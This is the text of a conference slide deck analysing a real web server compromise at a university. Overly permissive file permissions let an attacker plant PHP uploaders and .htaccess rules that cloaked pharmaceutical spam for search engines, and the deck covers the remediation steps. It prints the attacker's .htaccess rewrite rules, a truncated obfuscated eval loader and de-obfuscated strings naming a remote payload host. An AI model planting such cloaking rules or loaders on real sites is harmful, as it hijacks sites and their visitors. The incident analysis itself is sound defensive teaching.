Download to read offline
![Stupid
.htaccess
Tricks
II
<IfModule
mod_rewrite.c>
RewriteEngine
On
RewriteCond
%{HTTP_USER_AGENT}
(google|yahoo)
[OR]
RewriteCond
%{HTTP_REFERER}
(google|aol|yahoo)
RewriteBase
/
RewriteCond
%{THE_REQUEST}
/
RewriteCond
%{REQUEST_URI}
!/stats.php
RewriteRule
.+
stats.php
[L]
</IfModule>
25](https://image.slidesharecdn.com/beacon-anatomy-of-web-attack-130420122558-phpapp01/85/Bea-con-anatomy-of-web-attack-25-320.jpg)
![Stupid
.htaccess
Tricks
II
<IfModule
mod_rewrite.c>
RewriteEngine
On
RewriteCond
%{HTTP_USER_AGENT}
(google|yahoo)
[OR]
RewriteCond
%{HTTP_REFERER}
(google|aol|yahoo)
RewriteBase
/
RewriteCond
%{THE_REQUEST}
/
RewriteCond
%{REQUEST_URI}
!/stats.php
RewriteRule
.+
stats.php
[L]
</IfModule>
26](https://image.slidesharecdn.com/beacon-anatomy-of-web-attack-130420122558-phpapp01/85/Bea-con-anatomy-of-web-attack-26-320.jpg)
Uploaded byPatrick Laverty
Bea con anatomy-of-web-attack
This document summarizes a presentation about a web server hack at Brown University. The hack occurred due to overly permissive file permissions on the server that allowed a hacker to add malicious PHP files. These files redirected search engine traffic to pages selling pharmaceuticals, overloading the server with traffic and causing a denial of service. The presentation describes the timeline of events, how the file permissions issue allowed the hack to occur, examples of malicious code used, and steps taken to resolve the problem.
More Related Content
Similar to Bea con anatomy-of-web-attack
Bea con anatomy-of-web-attack
- 1. Anatomy of a Web Server Hack (it wasn’t fun or profitable) (for me) Patrick Laverty Brown University OWASP Rhode Island BSides Rhode Island TwiGer: @ProvWebAppSec 1
- 2. Who Am I? • Programmer/WebSec guy at Brown University • PaulDotCom Intern • hGp://www.securitybsides.com/BSidesRI • OWASP Rhode Island 2
- 3. What Happened? • We got DoS’d 3
- 4. What Happened? • We got DoS’d • (UnintenSonally) By 4
- 5. Step Back -‐ Timeline • Holiday weekend, 1 dept site down • Reports pharmaspam in Google results 5
- 6. Step Back -‐ Timeline • Holiday weekend, 1 dept site down • Reports pharmaspam in Google results • 7 pm, database server maxed out • Kill processes, they come back • Renaming databases, sites down 6
- 7. Step Back -‐ Timeline • Holiday weekend, 1 dept site down • Reports pharmaspam in Google results • 7 pm, database server maxed out • Kill processes, they come back • Renaming databases, sites down • But most importantly… 7
- 8. Step Back -‐ Timeline 8 Protect www.brown.edu
- 9. Why Did It Happen? • We’re a University • Open and easy • Security is a hassle 9
- 10. OK, Really Why? • One word: FilePermissions 10
- 11. OK, Really Why? • Two words: File Permissions 11
- 12. OK, Really Why? • Two words: File Permissions • >1200 accounts • 600 GB of files • Hundreds of sites 12
- 13. OK, Really Why? • Two words: File Permissions • More history: – Solaris Web Server – 16 groups per user max – Web server user – Thousands of groups on server – World Readable 13
- 14. OK, Really Why? • rwxrwxr-‐x • Security Problem? 14
- 15. OK, Really Why? • rwxrwxr-‐x • Security Problem? • Config files & db connecSon scripts • mysql_connect(db,user,password); • Policy: No sensiSve info 15
- 16. OK, Really Why? • Upgraded to Red Hat Linux • No limit to groups • Put server in every group • Removed world read: ie. rwxrwx-‐-‐-‐ 16
- 17. OK, Really Why? • Everything is writeable! 17
- 18. OK, Really Why? • Everything is writeable! • Whoops 18
- 19.
- 20.
- 21.
- 22. What Can That Do? • Add New Files • Edit Current Files • Find Places to Hide Files • Change Timestamps 22
- 23. What DID It Do? • Add New Files • Edit Current Files • Find Places to Hide Files • Change Timestamps • Examples? 23
- 24. Stupid .htaccess Tricks I RemoveHandler .html .htm AddType applicaSon/x-‐hGpd-‐php .php .htm .html 24
- 25. Stupid .htaccess Tricks II <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|aol|yahoo) RewriteBase / RewriteCond %{THE_REQUEST} / RewriteCond %{REQUEST_URI} !/stats.php RewriteRule .+ stats.php [L] </IfModule> 25
- 26. Stupid .htaccess Tricks II <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|aol|yahoo) RewriteBase / RewriteCond %{THE_REQUEST} / RewriteCond %{REQUEST_URI} !/stats.php RewriteRule .+ stats.php [L] </IfModule> 26
- 27.
- 28. Two Views • Browser: normal • Google, Yahoo, other search spiders? 28
- 29. Look Familiar? <?php //Packed MySQL query core $a4f12b6950e98b=str_rot13('tmhapbzcerff'); $a4f12b6950e98f=str_rot13(strrev('rqbprq_46rfno')); eval($a4f12b6950e98b($a4f12b6950e98f('eF6NVGu2k AQ/ ZU8VCKRqgrbJZFV5YGoxQilVLitvd6qinyBILApCiHBfH13z SAktkoL7OGOXM7uzO7H4LbHzf9259/ OndO1+85zlX38uqu8/e6… 29
- 30. De-‐obfuscated max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 30
- 31. Uh-‐Oh max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 31
- 32. Uh-‐Oh max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 32
- 33.
- 34.
- 35. Why the DoS? max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 35
- 36. Why the DoS? What Happens? • Google as Referrer -‐> hit page in .htaccess • Page pulls in code from files-‐uploader.com • Shows page selling Viagra • Brown University = Online Pharmacy • Plus, high Google ranking 36
- 37. How Do You Find It? 37
- 38. How’d We Fix It? Immediate Steps – Deleted the current offending uploader script & redirecSng .htaccess files – Traffic dropped off immediately 38
- 39. How’d We Fix It? Ongoing Steps – Remove all shell files – Remove all uploader files – Find and fix the .htaccess files – Remove the web server user as much as possible – Weakened the shell files – Set up shell file password search in logs – Monthly meeSngs to review 39
- 40. How Else is it Being Fixed? • One Word… • FilePermissions! 40
- 41. How Else is it Being Fixed? • One Word… • FilePermissions! • Three OpSons for Site Owners 41
- 42. OpSon 1 • One web editor? • rwxr-‐x-‐-‐-‐ • Web server user in the group 42
- 43. OpSon 2 • MulSple web editors • rwxrwxr-‐x • Web server user NOT in the group • Back to original security problem 43
- 44. OpSon 3 • Virtual Machine • Do whatever you want! 44
- 45. BoGom Line • Keep file permissions Sght • Keep so‚ware current • Keep users off server 45
- 46. QuesSons? Contact Info: Patrick Laverty Brown University Patrick@brown.edu @provwebappsec or @BSidesRI 46